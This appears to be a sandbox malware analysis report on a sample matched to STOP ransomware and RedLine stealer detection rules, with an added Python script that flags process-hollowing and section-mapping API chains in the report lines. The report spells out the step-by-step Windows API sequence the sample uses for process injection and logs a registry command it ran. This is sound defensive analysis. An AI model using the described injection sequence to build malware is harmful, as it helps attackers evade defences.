Source: C:\Users\user\AppData\Local\Temp\33A3.exe Code function: 14_2_0044ACFF 14_2_0044ACFF
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Code function: 14_2_0042CE51 14_2_0042CE51
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Code function: 14_2_00434E0B 14_2_00434E0B
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Code function: 14_2_00406EE0 14_2_00406EE0
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Code function: 14_2_00420F30 14_2_00420F30
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Code function: 14_2_00405057 14_2_00405057
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Code function: 14_2_0042F010 14_2_0042F010
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Code function: 14_2_004070E0 14_2_004070E0
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Code function: 14_2_004391F6 14_2_004391F6
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Code function: 14_2_0040D240 14_2_0040D240
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Code function: 14_2_00435240 14_2_00435240
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Code function: 14_2_004C9343 14_2_004C9343
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Code function: 14_2_00405447 14_2_00405447
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Code function: 14_2_00405457 14_2_00405457
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Code function: 14_2_00449506 14_2_00449506
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Code function: 14_2_0044B5B1 14_2_0044B5B1
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Code function: 14_2_00435675 14_2_00435675
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Code function: 14_2_00409686 14_2_00409686
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Code function: 14_2_0040F730 14_2_0040F730
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Code function: 14_2_0044D7A1 14_2_0044D7A1
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Code function: 14_2_00481920 14_2_00481920
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Code function: 14_2_0044D9DC 14_2_0044D9DC
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Code function: 14_2_00449A71 14_2_00449A71
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Code function: 14_2_00443B40 14_2_00443B40
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Code function: 14_2_00409CF9 14_2_00409CF9
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Code function: 14_2_0040DD40 14_2_0040DD40
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Code function: 14_2_00427D6C 14_2_00427D6C
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Code function: 14_2_0040BDC0 14_2_0040BDC0
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Code function: 14_2_00409DFA 14_2_00409DFA
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Code function: 14_2_00409F76 14_2_00409F76
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Code function: 14_2_0046BFE0 14_2_0046BFE0
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Code function: 14_2_00449FE3 14_2_00449FE3
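The API chains listed above carry the two injection techniques this report flags. Function 8_2_04A00110 (and its re-executed twin 13_2_04A40110) in 33A3.exe is the textbook RunPE/process-hollowing sequence: GetModuleFileNameA and CreateProcessA spawn a copy of itself, Wow64GetThreadContext reads the suspended thread's state, NtUnmapViewOfSection hollows the original image, VirtualAllocEx and NtWriteVirtualMemory/WriteProcessMemory plant the payload, and Wow64SetThreadContext plus ResumeThread redirect execution into it. The functions at 4_2_0040156B, 4_2_004015E0, 4_2_004015F1, 4_2_004015F5 and 4_2_004015F8 in the dropped dejcbcc show the other style: NtCreateSection followed by two NtMapViewOfSection calls, i.e. a section mapped locally to be filled and then mapped again (into a target process) so no WriteProcessMemory is needed. The following script is an added example by the editor, not code from the report or from the analysed sample: it parses Joe Sandbox "Code function:" lines and flags functions whose API list contains one of those chains in order. The signature tables (which API names count as interchangeable steps) are the example's own assumptions, and the SAMPLE_REPORT text is a handful of lines copied from this report.

```python
"""Flag process-hollowing and section-mapping API chains in Joe Sandbox
'Code function:' lines.

Added example by the editor; not part of the report or of the analysed
sample. SIGNATURES is an assumption about which API names form a chain;
SAMPLE_REPORT is copied from the report's own 'Code function:' lines.
"""
import re
from dataclasses import dataclass

# One 'Code function:' line has the shape
#   Source: <image> Code function: <pid>_<phase>_<addr> [Api1,Api2,...,] <pid>_<phase>_<addr>
# where the comma-terminated API list is absent for functions without
# recognised imports (e.g. "8_2_04A03520 8_2_04A03520").
LINE_RE = re.compile(
    r"^Source: (?P<source>.+?) Code function: "
    r"(?P<pid>\d+)_(?P<phase>\d+)_(?P<addr>[0-9A-Fa-f]{8}) "
    r"(?P<apis>(?:\w+,)*) ?(?P<ref>\d+_\d+_[0-9A-Fa-f]{8})$"
)

# Each step is a set of interchangeable API names; all steps must appear in
# this order (as a subsequence) for the technique to be reported. These
# tables are the example's assumption, not report content.
SIGNATURES = {
    "process_hollowing": (
        {"CreateProcessA", "CreateProcessW", "CreateProcessInternalW"},
        {"NtUnmapViewOfSection", "ZwUnmapViewOfSection"},
        {"VirtualAllocEx", "NtAllocateVirtualMemory"},
        {"WriteProcessMemory", "NtWriteVirtualMemory"},
        {"SetThreadContext", "Wow64SetThreadContext", "NtSetContextThread"},
        {"ResumeThread", "NtResumeThread"},
    ),
    # A section created and then mapped twice (fill locally, map remotely).
    # Listing NtMapViewOfSection as two steps enforces the double mapping;
    # a single map of a created section is ordinary file/shared-memory use.
    "section_mapping": (
        {"NtCreateSection", "ZwCreateSection"},
        {"NtMapViewOfSection", "ZwMapViewOfSection"},
        {"NtMapViewOfSection", "ZwMapViewOfSection"},
    ),
}


@dataclass(frozen=True)
class CodeFunction:
    source: str
    pid: int
    addr: str
    apis: tuple


@dataclass(frozen=True)
class Finding:
    pid: int
    addr: str
    technique: str
    source: str


def parse_line(line):
    """Return a CodeFunction for a 'Code function:' line, else None."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    apis = tuple(a for a in m["apis"].split(",") if a)
    return CodeFunction(m["source"], int(m["pid"]), m["addr"].upper(), apis)


def matches_in_order(apis, steps):
    """True if every step set is hit by some API, in order (subsequence match)."""
    it = iter(apis)
    return all(any(api in step for api in it) for step in steps)


def classify(fn):
    """Names of every signature whose chain the function's API list contains."""
    return [name for name, steps in SIGNATURES.items()
            if matches_in_order(fn.apis, steps)]


def analyze(report_text):
    """Parse every line of a report excerpt and return the injection findings."""
    findings = []
    for line in report_text.splitlines():
        fn = parse_line(line)
        if fn is None:
            continue
        for technique in classify(fn):
            findings.append(Finding(fn.pid, fn.addr, technique, fn.source))
    return findings


def summarize(findings):
    """Group hits as {technique: sorted (pid, addr) pairs} for the write-up."""
    out = {}
    for f in findings:
        out.setdefault(f.technique, set()).add((f.pid, f.addr))
    return {k: sorted(v) for k, v in out.items()}


# Constructed input: lines copied verbatim from this report.
SAMPLE_REPORT = r"""
Source: C:\Users\user\AppData\Roaming\dejcbcc Code function: 4_2_004026D2 NtOpenKey, 4_2_004026D2
Source: C:\Users\user\AppData\Roaming\dejcbcc Code function: 4_2_0040156B NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 4_2_0040156B
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Code function: 8_2_04A00110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,ExitProcess, 8_2_04A00110
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Code function: 13_2_04A40110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,ExitProcess, 13_2_04A40110
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Code function: 8_2_04A03520 8_2_04A03520
"""

if __name__ == "__main__":
    for technique, hits in summarize(analyze(SAMPLE_REPORT)).items():
        print(technique, hits)
```

The matcher is deliberately order-sensitive: the sandbox only lists the imports a function references, so an API list is static evidence, and requiring the hollowing steps in sequence keeps a function that merely imports CreateProcessA and WriteProcessMemory for unrelated reasons from being flagged. The Wow64* variants in the chain confirm a 32-bit image running under WOW64, consistent with the 32exe tag and the RELOCS_STRIPPED/32BIT_MACHINE PE flags below.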
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe B1E829E912594D5AF36D66E7F55362A9A07BE9F44D9683F59390B0B731C9DFD3
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\33A3.exe B1E829E912594D5AF36D66E7F55362A9A07BE9F44D9683F59390B0B731C9DFD3
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Code function: String function: 00428C81 appears 84 times
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Code function: String function: 04A68EC0 appears 57 times
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Code function: String function: 00420EC2 appears 40 times
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Code function: String function: 04A30160 appears 50 times
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Code function: String function: 04A28EC0 appears 57 times
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Code function: String function: 004547A0 appears 150 times
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Code function: String function: 00422587 appears 48 times
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Code function: String function: 0042F7C0 appears 194 times
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Code function: String function: 0044F23E appears 106 times
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Code function: String function: 00428520 appears 154 times
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Code function: String function: 04A70160 appears 50 times
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Code function: String function: 00425007 appears 36 times
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Code function: String function: 00450870 appears 52 times
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Code function: String function: 00454E50 appears 82 times
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Code function: String function: 00441A25 appears 44 times
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Code function: String function: 0044F26C appears 40 times
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 1028 -s 10828
Source: XVM5nluelx.exe, 00000000.00000000.1990814559.0000000002C8B000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenamesFilezera2 vs XVM5nluelx.exe
Source: XVM5nluelx.exe Binary or memory string: OriginalFilenamesFilezera2 vs XVM5nluelx.exe
Source: XVM5nluelx.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe reg add "HKEY_CURRENT_USER\Software\clicker\key" /v primary /t REG_DWORD /d 1
Source: 9.2.33A3.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 9.2.33A3.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 13.2.33A3.exe.4a415a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 13.2.33A3.exe.4a415a0.1.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 26.2.33A3.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 26.2.33A3.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 13.2.33A3.exe.4a415a0.1.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 8.2.33A3.exe.4a015a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 13.2.33A3.exe.4a415a0.1.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 8.2.33A3.exe.4a015a0.1.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 22.2.33A3.exe.4a015a0.1.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 22.2.33A3.exe.4a015a0.1.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 8.2.33A3.exe.4a015a0.1.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 8.2.33A3.exe.4a015a0.1.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 25.2.33A3.exe.49e15a0.1.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 25.2.33A3.exe.49e15a0.1.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 14.2.33A3.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 14.2.33A3.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 26.2.33A3.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 26.2.33A3.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 22.2.33A3.exe.4a015a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 22.2.33A3.exe.4a015a0.1.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 16.2.33A3.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 16.2.33A3.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 15.2.33A3.exe.4a315a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 15.2.33A3.exe.4a315a0.1.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 23.2.33A3.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 23.2.33A3.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 15.2.33A3.exe.4a315a0.1.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 15.2.33A3.exe.4a315a0.1.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 23.2.33A3.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 23.2.33A3.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 16.2.33A3.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 16.2.33A3.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 25.2.33A3.exe.49e15a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 25.2.33A3.exe.49e15a0.1.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 14.2.33A3.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 14.2.33A3.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 9.2.33A3.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 9.2.33A3.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000004.00000002.2342522385.0000000002E8B000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000010.00000002.3250613248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000010.00000002.3250613248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 0000000D.00000002.2432836380.0000000002EB7000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000016.00000002.2529798141.0000000002EAE000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
